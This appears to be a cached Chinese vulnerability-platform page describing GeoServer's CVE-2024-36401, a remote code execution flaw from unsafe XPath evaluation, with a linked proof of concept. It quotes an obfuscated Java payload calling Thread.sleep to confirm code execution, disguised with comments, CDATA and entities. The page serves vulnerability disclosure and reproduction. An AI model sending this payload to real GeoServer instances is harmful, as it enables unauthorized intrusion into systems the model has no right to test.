漏洞平台

POC详情： 80487300686ab63b0ad7811dfc0e911ed5e9af31

来源

https://github.com/zgimszhd61/CVE-2024-36401

关联漏洞

标题： GeoServer 安全漏洞 (CVE-2024-36401)
描述：GeoServer是一个用 Java 编写的开源软件服务器。允许用户共享和编辑地理空间数据。 GeoServer 存在安全漏洞，该漏洞源于不安全地将属性名称解析为 XPath 表达式，可能导致远程代码执行。

介绍

# CVE-2024-36401
CVE-2024-36401 是由于 GeoServer 使用的 GeoTools 库在解析 XPath 表达式时存在安全问题，导致未授权的攻击者可以通过构造恶意的 OGC 请求参数执行任意代码。

具体来说，该漏洞源于对属性名称作为 XPath 表达式进行不安全的评估，影响所有版本的 GeoServer。

如果有人在复现CVE-2024-36401漏洞时遇到困难，可以尝试以下代码：

```java
/+java.lang.T<!--IgnoreMe!!!!-->hread.s[(: IGNORE :)]leep&#010;&#032;&#009;<![CDATA[
(2000)
]]>
```

这是一个基于时间的代码，可以证明代码执行成功。（java.lang.Thread.sleep）

![image](https://github.com/zgimszhd61/CVE-2024-36401/assets/114722053/b2f08f11-cac4-4456-a25d-39a18b399ca4)

文件快照


 [4.0K]  /data/pocs/80487300686ab63b0ad7811dfc0e911ed5e9af31
├── [ 11K]  LICENSE
├── [ 835]  poc.py
└── [ 752]  README.md

0 directories, 3 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。